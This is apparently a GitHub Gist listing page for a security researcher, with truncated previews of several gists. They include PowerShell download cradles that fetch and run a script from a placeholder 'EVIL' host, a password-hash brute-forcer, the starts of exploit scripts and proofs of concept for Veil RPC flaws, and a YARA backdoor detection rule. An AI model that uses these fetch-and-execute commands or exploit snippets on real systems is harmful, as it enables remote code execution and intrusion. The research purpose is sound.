Brian Wallace bwall

bwall / Comparing RF and CNN Adversarial Samples.ipynb
Last active Jun 9, 2018
Comparing RF and CNN Adversarial Samples
View Comparing RF and CNN Adversarial Samples.ipynb
View [Work in Progress] Ashes.ipynb
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
bwall / brute_force_hash_encoding.py
Created Jun 6, 2016
Attempt to brute force the hashing/encoding methods for stored passwords
View brute_force_hash_encoding.py
from hashlib import sha1, sha256, sha224, sha384, sha512, md5
from base64 import b64encode, b32encode
digest = "894b186bf79d4337c4f44140a2ec12b42d13a79f".decode("hex")
hexdigest = "894b186bf79d4337c4f44140a2ec12b42d13a79f"
methods = {
    "encode_hex": lambda x: x.encode("hex"),
View Julia_Full_Cluster_Compromise.py
import socket
import time
import struct
from random import randint
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
View exploit_veil_msfvenom.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print json.dumps(command)
    s.send(json.dumps(command))
    s.close()
View exploit_veil_pescrambler.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print json.dumps(command)
    s.send(json.dumps(command))
    s.close()
View exploit_veil_hyperion.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print json.dumps(command)
    s.send(json.dumps(command))
    s.close()
bwall / pocs.py
Last active Apr 1, 2016
Proof of concepts for recently released Veil RPC vulnerabilities
View pocs.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print json.dumps(command)
    s.send(json.dumps(command))
    s.close()
View operation_dust_storm.yara
rule Misdat_Backdoor_Packed
{
    meta:
        author = "Cylance SPEAR Team"
        note = "Probably Prone to False Positive"
    strings:
        $upx = {33 2E 30 33 00 55 50 58 21}
        $send = {00 00 00 73 65 6E 64 00 00 00}
        $delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}